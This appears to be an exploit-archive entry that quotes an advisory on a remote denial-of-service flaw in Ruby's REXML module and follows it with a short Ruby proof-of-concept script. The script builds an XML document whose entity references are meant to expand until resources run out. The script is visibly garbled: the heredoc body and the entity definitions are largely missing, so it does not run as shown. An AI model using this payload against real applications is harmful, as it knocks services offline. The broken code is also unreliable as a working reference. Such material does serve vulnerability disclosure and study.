source: https://www.securityfocus.com/bid/30802/info Ruby is prone to a remote denial-of-service vulnerability in its REXML module. Successful exploits may allow remote attackers to cause denial-of-service conditions in applications that use the vulnerable module. Versions up to and including Ruby 1.9.0-3 are vulnerable. #!/usr/bin/env ruby require 'rexml/document' doc = REXML::Document.new(< ]> &a; END puts doc.root.text.size